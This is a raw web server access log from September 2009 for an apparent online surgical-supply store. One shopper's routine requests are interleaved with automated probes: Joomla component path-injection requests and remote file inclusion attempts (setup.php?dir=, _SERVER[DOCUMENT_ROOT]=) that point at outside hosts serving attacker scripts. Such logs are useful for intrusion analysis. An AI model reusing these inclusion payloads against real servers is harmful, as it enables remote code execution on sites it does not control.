202.44.32.9 - - [23/Sep/2009:00:47:51 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 271 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:51 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 271 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:51 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 276 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:51 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 276 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:51 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 276 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:52 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 298 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:52 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 271 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:52 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 276 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:54 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:54 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:55 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:55 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:55 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:55 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:55 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:55 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:47:56 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.806"
98.195.56.213 - - [23/Sep/2009:00:47:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532D4707F82200253705Z+M37+ENG HTTP/1.1" 200 40908 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4305F86200105705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
61.100.5.136 - - [23/Sep/2009:00:47:59 -0400] "GET /logs/access_log.Q109071200/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:47:59 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4707F82200253705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
61.100.5.136 - - [23/Sep/2009:00:47:59 -0400] "GET /logs/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:00 -0400] "GET /setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:00 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
202.44.32.9 - - [23/Sep/2009:00:48:02 -0400] "GET /logs/error_log.Q109062600//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 297 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:48:02 -0400] "GET /logs/error_log.Q109062600//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 297 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:48:03 -0400] "GET /logs/error_log.Q109062600//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 297 "-" "libwww-perl/5.806"
61.100.5.136 - - [23/Sep/2009:00:48:03 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
202.44.32.9 - - [23/Sep/2009:00:48:03 -0400] "GET /logs/error_log.Q109062600//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 297 "-" "libwww-perl/5.806"
61.100.5.136 - - [23/Sep/2009:00:48:03 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:10 -0400] "GET /logs/access_log.Q109071200/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:11 -0400] "GET /logs/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:11 -0400] "GET /setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.44.32.9 - - [23/Sep/2009:00:48:13 -0400] "GET /logs/access_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 260 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:48:13 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:48:13 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.806"
61.100.5.136 - - [23/Sep/2009:00:48:18 -0400] "GET /logs/access_log.Q109060200%20%20/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:18 -0400] "GET /logs/access_log.Q109081000%20%20/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:48:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C01481200514705Z+M37+ENG HTTP/1.1" 200 41008 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4707F82200253705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
61.100.5.136 - - [23/Sep/2009:00:48:19 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:27 -0400] "GET /setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:27 -0400] "GET /logs/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:27 -0400] "GET /logs/access_log.Q109071200/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:48:38 -0400] "GET /logs/access_log.Q109091200/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:48:54 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C01481200514705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C01481200514705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:56 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD HTTP/1.1" 200 31292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:48:57 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001393010000O0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.30.142.250 - - [23/Sep/2009:00:48:51 -0400] "GET /logs/access_log.Q109072100 HTTP/1.0" 200 4525475 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.100.5.136 - - [23/Sep/2009:00:49:27 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:49:30 -0400] "GET /logs/access_log.Q109081000%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:49:30 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C01481200514705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
203.130.232.108 - - [23/Sep/2009:00:49:31 -0400] "GET /logs/error_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.831"
98.195.56.213 - - [23/Sep/2009:00:49:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG HTTP/1.1" 200 38850 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4C01481200514705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:49:33 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
203.130.232.108 - - [23/Sep/2009:00:49:39 -0400] "GET /logs/error_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=32482(writingc)%20gid=32482(writingc)%20groups=32482(writingc)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.831"
61.100.5.136 - - [23/Sep/2009:00:49:40 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:49:43 -0400] "GET /logs/access_log.Q109060200%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
